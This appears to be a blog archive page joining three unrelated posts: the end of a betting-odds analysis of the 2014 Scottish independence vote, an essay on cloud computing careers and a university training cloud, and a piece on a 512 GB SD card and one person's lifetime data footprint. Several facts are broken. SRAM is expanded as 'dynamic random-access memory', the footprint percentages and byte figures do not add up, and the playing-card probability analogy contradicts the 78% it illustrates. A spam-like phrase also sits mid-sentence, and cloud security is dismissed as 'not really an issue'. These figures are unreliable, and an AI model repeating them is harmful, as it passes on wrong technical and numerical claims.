On the day before the second debate there was a peak Yes Vote odds of 6.3 (22 August 2014), and this has since fallen to nearly 4 ( 31 August 2014). The largest changes in the odds have thus occurred around the debate points, with 5 August 2014 having 31 changes (where general the No vote odds have drifted out) and 9 changes on 23 August 2014. Also, typically, there is an increasing rate of change of the odds as we move closer to the vote.

Conclusions

There is a strange dynamic going on in the betting market, as the polls are saying it is close, but the bookmarkers are not reflecting that. Overall there’s only one thing that really matters, and that is the vote tomorrow, and opinion polls and bookmarker odds can only make best guess on a generalised feeling of the nation. For this vote, may perhaps show a new dynamic, where it is difficult to generalise feelings and analysis purely by opinion polls or general sentiment. It has been a vote which most of the printed media outlets have backed the No campaign, but, in these days of social media, they are not necessarily the main outlets for information.

Key observations:

  • Some bookmakers, especially the spread betting ones have rapid changes in odds, while other are static (with one bookmaker making changes in the odds one a month).
  • The largest number of changes in a single day, over the past five months, was 31 and occurred on 5 August 2014, which was the date of the debate between Alex Salmond and Alistair Darling.
  • Dundee, Glasgow and Clackmannanshire come out way in-front for the place most likely to vote Yes, with Dumfries and Galloway the least.
  • The odds are erring on the side of a Yes vote from 45% to 50%.

One disappointing factor is that Betfair has already started to pay-out on a No vote, as they reckon it is 78% certain (which in no way is even nearly a certainty). In fact, that’s the odds of not pulling out the Ace of Spades from four cards holding each of the aces. In one in four turns we will pull-out the ace of spades. So I do maths and not politics, but I do understand that 78% is nowhere near certain.

Well only tomorrow will actually define what really has happened … the bookmakers and punters can only speculate.

Note: This is a non-political analysis, and is purely focused on analysing open-source data related to bookmaker odds. It is inspired by the usage of big data analysis, and how this identifies trends.

The Architects of the Future – Creating the Virtual Infastructure for our Lives

Introduction

AEnergy efficient constructions we stand at the beginning of a new semester, our computer science students stand in a place to become the architects of the future. It is within the Internet and the Cloud that we are building a new World, and one which does not differentiate any class or nationality, as it completely inclusive for everyone in the World.

Few technologies have ever managed to make such an impact on our lives, and it is our new Computer Science students who will build these systems. In time, too, the Internet will improve our health and social care, and will deliver education to every single person, also providing everyone with a voice and a platform to showcase their talents (I appreciate that it can go the other way, and that it can provide a barrier to these things to, but our new architectures have the chance to improve things, and not see national or physical barriers getting in their way).

As students start their career in computing science, they must think clearly about their future, and position themselves to pick-up the skills that are required to re-architect the most amazing infrastructure that mankind has ever created: The Internet, and within the Internet we are building the most amazing building ever: The Cloud. As part of this there are so many new rock-star careers being created which will properly build it including for the great growth areas of Cloud Computing, Big Data, Cyber Security, and e-Health (Figure 1).

Figure 1: Four great career of this new generation: Cloud Computing, Big Data, Cyber Security and e-Health

Changing landscape

We are in a phase of saying goodbye to the desktop PC, which has served us well for the last 30-odd years. The future,though, is to continue their legacy to build clustered computing environments, using heterogeneous servers, and move away from stand-alone systems to ones who build into a generalised computing infastructure.

This new infrastructure will allow our desktops within a cloud infrastructure, rather than run it on a physical computer. This has many advantages for companies, especially in updating desktops within their cloud, rather than on physical hosts.

So we are in a phase where we are re-architecting our information infrastructure, where we have moved though a phase of stand-alone computers (in the 1980s), onto congregated hosts around physical servers and in gaining access to software components (DLLs), and now onto running our computing infrastructure in centralised way, where we use terminals to access the resources - thin computing, and where applications are building by binding to Web services – Figure 2. This change is reflected in a new software architecture: SoA (Sevice-Oriented Architecture) where software applications are created by binding them to services which run in the Cloud.

222Figure 2: Re-architecting

Hello Clustering

The demand for processing power, and data storage are becoming key drivers with the spend on servers increasing 6% over the past year (and over 4% in Q1 of 2014, alone). It is thought that 17% of this spend is for Big Data/Cloud applications. Overall the Intel x86 architecture has the lead, with nearly 80% of the market revenue. The growth in servers is also identified with an increase of 19% in Microsoft Windows and 15% growth for Linux.

HP (35.7%), Dell (15.1%) and Oracle (7% – gained from their acquisition of Sun Microsystems) all recorded increases between 7 and 8%, while IBM (22.2%) dropped their review by 15.5%, mainly due to them selling off their lower-end x86 server architecture technology to Lenovo. Cisco Systems, while only gaining 4.8% of the market, have shown a 63.1% increase in server turnover.

Advanced Teaching Cloud

To create the architects of the future, we need to ways to support them, where they can learn in a safe environment, and where they can learn the limits of what possible. We thus need new virtualised environments where students can learn about all of the elements of what creates these new buildings, and understand how to design, build and look-after them.

At Edinburgh Napier, we’ve been building our own training cloud here, as we found it has many advantages of running virtualised infastructures, where we can create real-life information environments (figures 3 and 4). This environment can range from building full-defined systems, which connect to the Internet, to ones which are fully sandboxed and which they can analyse malware spreads and in using advanced security tools.

Slide8Figure 3: Advantages of using the Cloud for training

Slide11Figure 4: DFET Virtual Training environment

Conclusions

What we are seeing at the current time is a re-architecting of information systems, from physical hosts congregated against physical servers, we are moving to the point where virtual hosts congregate around virtual servers, running in a Cloud infrastructure. This is a massive change, and it is the clustered servers who provide a resource for all the hosts and servers to share the same clustered environment, so that everything is controlled by software, and where hardware does not limit any of the virtual hosts.

For those graduating, studing or entering computing science, there has never been such create opportunities, and it is to you that we look to, to rebuild this amazing infastructure, and create something that has benefits for every person in the World. At one time knowledge was locked-away within privileged cities and countries, but not any more, the Internet has enable knowledge for all, no matter their background, location or financial status.

So there was fire … the wheel … the transistor … and Cloud Computing!

Your Whole Life on a Postage Stamp

Introduction

SanDisk have just created an SD card with 512 GB of memory, and it is expected that 2 TB will be achieved from the format. As someone who also has over 1TB in both my Microsoft OneDrive and Dropbox, but only 8GB on my university account, it seems that my corporate storage systems are not keeping up with the latest trend in the scale-up in cloud-based storage. It should be remember that security in the Cloud is not really an issue, as it is possible to storage into a cloud-based data bucket, and encrypt the data. So as data storage capacity has increased 1000-fold over the last 10 years, my corporate storage has increased by a factor of eight.

Intel created the first DRAM (dynamic random-access memory) chip in 1971. It was named the 1103 and could hold 1kB of data. DRAM chips are made up of small capacitors which are charged up with electrical charge (for a binary 1), or discharged (for a binary 0). As they use the charging up and discharging of capacitors, they tended to be slower than the static version – SRAM (dynamic random-access memory), which toggle the state of a pair of transistors. A SRAM needs a larger space than DRAM, DRAM has often been used to create larger memory storage chips than the equivalent SRAM ones. Both SRAM and DRAM lose their contents when the power is taken away (volatile memory), so storage systems use nonvolatile memory to preserve the data when the power is taken away.

Life on a postage stamp

The IBM PC, released in 1981, only had around 1MB of memory and a 30MB hard disk. Now we are looking at 2TB on a card the size of a postage stamp (where the area is mainly taken up with the physical layout of the card and connector). One of the key growth areas of computing is likely to be in-memory computing, where it is possible to store all the data you need locally on memory, and have no real need for connections to the Internet. With a 2TB data storage, you could probably hold all the data you are ever going to need.

So let’s look at Bob’s footprint over his 80 years on the planet:

  • Email. Bob sends 300 emails a day, and receives 400, each have 1000 characters (1B), so that’s 700KB each day, and 255MB a year. Then over 80 years this generates 20GB of emails. Footprint: 0.1%.
  • Photos. I take five photos every day, each are 1.5MB. This 547MB each year, and over 80 years it creates 43GB. Footprint: 2.15%.
  • Documents. Bob creates 10 documents each day, with an average of 1MB for document, which creates 3.6GB over a year, and 292GB over 80 years. Footprint: 14.6%.
  • Bob loves Wikipedia, which takes around 10GB of space, and this would take Footprint: 0.05%.
  • Social media. Bob wants to save ever post that he has made to Facebook, Twitter, and other social media sites. This is an average 30MB of data each day. This gives 10.9GB of data each year, and 876GB of data over 80 years. Footprint: 43.8%.
  • Video. Bob takes a 5 videos each week, with a size of 100MB. That’s 5.2GB each year, and 416GB for 80 years. Footprint: 20.8%.

So that is 81% of the SD card used and we have stored the whole of Bob’s life … every email, photo, media post … in fact everything on the size of a postage stage.

Why don’t corporate systems keep up with the Cloud?

Corporations are still struggling with the Cloud, and knowing how they should use public and private cloud, and how to create a single entity which keeps some things locally, but can burst into public cloud spaces (Figure 1). The problems with the scalability have continually been around performance, resilience, and security.

  • Security. Security can be solved by creating an encryption layer for all the data which leaves the corporate infrastructure and is then stored in a public cloud.
  • Resilience. With resilience, the main cloud providers such as Amazon AWS and Microsoft Azure have shown a near 100% up-time over the past few years, with very few problem with outages. The last major outage for Amazon Web Services (AWS) happened in August 2013 for nearly an hour and was due to issues in their North Virginia datacenter. It mainly affected Amazon.com, but it’s effect on many companies who had built their own business in the Cloud, such as Vine and Instagram.It is estimated that Amazon lost as much as $1,100 in net sales per second (to put into context a five-minute outage in August 2013 cost Google $545,000).
  • Performance. Performance has always been an issue, especially where network connections are slow, or become busy over certain time periods. This as an issue is reducing as high-speed network connections provide fast response rates, especially where the content is placed at the edge of the public cloud.

Slide3Figure 1: Public, private and hybrid clouds

Conclusions

Corporations are playing catch-up with the Cloud, and many are in the process of understanding how they can create a single Cloud infastructure, which is integrates their private cloud infastructure with a public one. In order to do this effectively they need to understand issues around security, performance and resiliance. When this is done, then perhaps I can get more than 8GB for my storage.

We now have the opportunity to store all the data that we need in-memory, and have no need to store in remote databases. Increasing applications may store all the data they need in-memory, and avoid fetching is from relatively slow network connections.